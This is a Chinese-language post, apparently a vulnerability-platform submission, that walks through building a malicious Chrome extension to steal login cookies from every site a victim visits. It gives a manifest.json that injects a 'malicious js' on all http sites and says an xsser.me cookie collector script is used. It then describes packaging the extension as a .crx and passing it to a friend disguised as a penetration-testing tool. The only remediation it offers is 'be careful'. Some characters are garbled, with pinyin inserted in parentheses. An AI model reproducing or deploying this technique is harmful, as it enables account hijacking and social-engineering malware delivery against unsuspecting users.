以前挖了一堆XSS,一開始覺得挺好玩的,后來覺悟了,以后提交就提交那種特別帶感的,不好意思,哥,不大清楚應(yīng)該是什么類型,您幫忙看看吧。。。這個純屬自己無聊時候想出來的,也不知道能不能通過。。。
Chrome插件開發(fā),通過惡意的Chrome插件執(zhí)行達(dá)到劫持整個
瀏覽器,凡是通過chrome瀏覽器登陸的網(wǎng)站自動發(fā)送COOKIE。
在開始之前先來點(diǎn)chrome插件開發(fā)上的基礎(chǔ),開發(fā)一個chrome插件需要幾個文件。
主文件 manifest.json (類似配置文件) 這次使用的manifest是:
{
"name": "ThE WorLd", //名字
"version": "1.0", //版本
"manifest_version": 2, //這個必須有
"icons":{"128":"smile.gif"}, //圖標(biāo)
"content_scripts":[ //設(shè)定javascript與網(wǎng)站的通信
{
"matches":["http://*/*"], //設(shè)定與插件js通信的域 http://*/* 指任意網(wǎng)站
"js":["location.js"] //惡意js腳本
}
],
"description": "TEST", //備注一樣的玩意
"browser_action": { //圖標(biāo)
"default_icon": {
"19": "icon.gif",
"38": "smile.gif"
},
"default_title":"ThE WorLd",
"default_popup": "popup.html" //彈出窗口
}
}
content_scripts 這個是重點(diǎn)選項,可以設(shè)定網(wǎng)站與javascript的通信,這里我們設(shè)定了任意網(wǎng)址,如果只是想盜取比如微博的cookie只要設(shè)定 類似http://t.qq.com/* 就行,后面我們用上xsser.me 的js腳本。為了達(dá)到更好的欺騙效果,我們還得美化下popup.html。
不過這里我就不弄了,我不會美化。。。簡單寫兩。
<h2>WOOYUN</h2>
最后使用到的就是一下幾個玩意:
然后通過chrome導(dǎo)入插件。
最后我們用chrome登陸幾個網(wǎng)站看看。
最后登入XSSER 截取cookie成功。
最后我們淫蕩地用chrome生成插件。
吧下面那個.crx淫蕩的給別人,說,哥們,哥發(fā)現(xiàn)了一
滲透神器........然后 她GAME OVER
修復(fù)方案:
小心這類玩意就是了...........
哥 可以的話給加個精華行不。。。。。